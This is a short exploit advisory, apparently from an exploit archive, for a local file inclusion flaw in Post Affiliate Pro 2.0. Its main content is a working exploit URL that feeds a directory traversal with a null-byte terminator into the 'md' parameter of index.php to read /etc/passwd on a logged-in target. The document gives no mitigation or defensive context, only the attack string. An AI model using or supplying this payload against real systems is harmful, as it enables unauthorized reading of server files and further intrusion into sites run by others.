id: 3909
date: 10/15/2008
title: Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability
author: ZeN
cves: 

========================================================================
Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability
========================================================================


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Software : Post Affiliate Pro v2.0
Vulnrability : Local File Inclusion
Severity : High

Author : ZeN
Date : 16 October 2008

Websites >
http://DUSecurity.com
http://DarkCode.me

PS : You MUST be logged into the system for the exploit to work.

Exploit >

http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2023-03-26]  #